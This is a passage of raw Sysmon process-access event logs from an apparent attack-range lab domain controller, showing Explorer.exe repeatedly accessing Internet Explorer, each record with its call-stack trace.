Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1bee6(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10ab73(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a96a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64) 10341000x800000000000000014289Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f167(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a94f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13f579(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13fa8d(wow64) 10341000x800000000000000014288Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f0e8(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a94f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13f579(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13fa8d(wow64) 10341000x800000000000000014287Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1cc0a(wow64)|C:\Windows\System32\shcore.dll+1bf0b(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a94f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64) 10341000x800000000000000014286Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1bee6(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a94f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64) 10341000x800000000000000014285Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f167(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a918(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13f579(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13fa8d(wow64) 10341000x800000000000000014284Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f0e8(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a918(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13f579(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13fa8d(wow64) 10341000x800000000000000014283Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1cc0a(wow64)|C:\Windows\System32\shcore.dll+1bf0b(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a918(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64) 10341000x800000000000000014282Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1bee6(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a918(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64) 10341000x800000000000000014281Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f167(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a8e3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13f579(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13fa8d(wow64) 10341000x800000000000000014280Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f0e8(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a8e3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13f579(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13fa8d(wow64) 10341000x800000000000000014279Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1cc0a(wow64)|C:\Windows\System32\shcore.dll+1bf0b(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a8e3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64) 10341000x800000000000000014278Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.880{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1bee6(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a8e3(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a438(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a386(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64) 10341000x800000000000000014277Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.848{08A6967A-4288-6000-1500-000000009A01}13241668C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014276Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.833{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f167(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10ab33(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a010(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+21b4d4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+109cd4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a364(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64) 10341000x800000000000000014275Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.833{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1cbc8(wow64)|C:\Windows\System32\shcore.dll+1ec1c(wow64)|C:\Windows\System32\SHELL32.dll+12f0e8(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10ab33(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a010(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+21b4d4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+109cd4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a364(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e6c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11d72a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5d7f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+b5bc5(wow64) 10341000x800000000000000014274Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.833{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1cc0a(wow64)|C:\Windows\System32\shcore.dll+1bf0b(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10ab33(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a010(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+21b4d4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+109cd4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+10a364(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+11e8fa(wow64) 10341000x800000000000000014273Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:42:44.833{08A6967A-4781-6000-3A05-000000009A01}69287028C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{08A6967A-4754-6000-1705-000000009A01}3408C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+1be71(wow64)|C:\Windows\System32\shcore.dll+1bee6(wow64)|C:\Windows\System32\shcore.dll+1bba2(wow64)|C:\Windows\System32\shcore.dll+1bae0(wow64)|C:\Windows\System32\shcore.dll+1ba15(wow64)|C:\Windows\System32\SHELL32.dll+12f0d3(wow64)|C:\Windows\System32\SHELL32.dll+12ee0c(wow64)|C:\Windows\SYSTEM32\IEFRAME.d